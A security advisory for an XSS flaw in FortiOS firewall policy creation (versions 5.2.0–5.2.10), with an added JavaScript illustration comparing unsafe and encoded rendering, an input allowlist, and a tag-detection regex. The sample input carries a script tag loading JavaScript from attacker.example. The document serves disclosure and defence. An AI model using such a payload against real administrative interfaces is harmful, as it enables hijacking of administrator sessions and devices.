PSIRT Advisory

FortiOS XSS via srcintf during Firewall Policy Creation

Summary

An XSS vulnerability caused by unsanitized input in the srcintf parameter during Firewall Policy Creation can be exploited to load and run remote (malicious) JavaScript in the browser of a logged-in administrator.
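The following is an added illustration of the vulnerability class, not Fortinet's code and not the FortiOS implementation. It contrasts a policy-table renderer that interpolates the submitted interface name straight into HTML with one that HTML-encodes it first, and adds the allowlist check a web UI should apply to an interface name before rendering it at all. The function names, the sample interface value and the attacker.example host are constructed for this example.

```javascript
// Added example (hypothetical code, not from FortiOS): an interface-name
// parameter reflected into a page without encoding becomes XSS; encoding
// and input validation both prevent it.

// HTML entity encoding for text placed inside an element body or attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: raw string interpolation of the srcintf value.
function renderPolicyRowUnsafe(srcintf) {
  return `<td class="srcintf">${srcintf}</td>`;
}

// Hardened pattern: encode before interpolation.
function renderPolicyRowSafe(srcintf) {
  return `<td class="srcintf">${escapeHtml(srcintf)}</td>`;
}

// Defence in depth: an interface name should only ever contain a small
// character set, and in a real UI should additionally be checked against
// the interfaces that actually exist on the device. The pattern below is an
// assumption for this example, not a FortiOS rule.
function isPlausibleInterfaceName(srcintf) {
  return /^[A-Za-z0-9_.-]{1,32}$/.test(String(srcintf));
}

// Crude detector used only to show the difference between the two renderers:
// flags a script tag, an img tag or an on* event handler attribute in markup.
function containsInjectedTag(html) {
  return /<script\b|<img\b|\bon\w+\s*=/i.test(html);
}

// Constructed sample input: a benign name and one carrying a remote script
// include of the kind the advisory describes.
const benignInterface = 'port1';
const hostileInterface =
  'port1<script src="https://attacker.example/x.js"></script>';

// Stand-alone run: print what each renderer produces for both inputs.
for (const name of [benignInterface, hostileInterface]) {
  console.log('allowlisted :', isPlausibleInterfaceName(name));
  console.log('unsafe      :', renderPolicyRowUnsafe(name));
  console.log('safe        :', renderPolicyRowSafe(name));
}
```

Encoding at the output point is the fix for the rendering bug; the allowlist check rejects the hostile value before it is stored, which also protects any other page that later displays the same policy.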

Impact

Execute unauthorized code or commands

Affected Products

FortiOS versions 5.2.0 to 5.2.10

Solutions

Upgrade to FortiOS version 5.2.11

Acknowledgement

Fortinet is pleased to thank independent researcher Amir Morshedizadeh for reporting this vulnerability under responsible disclosure.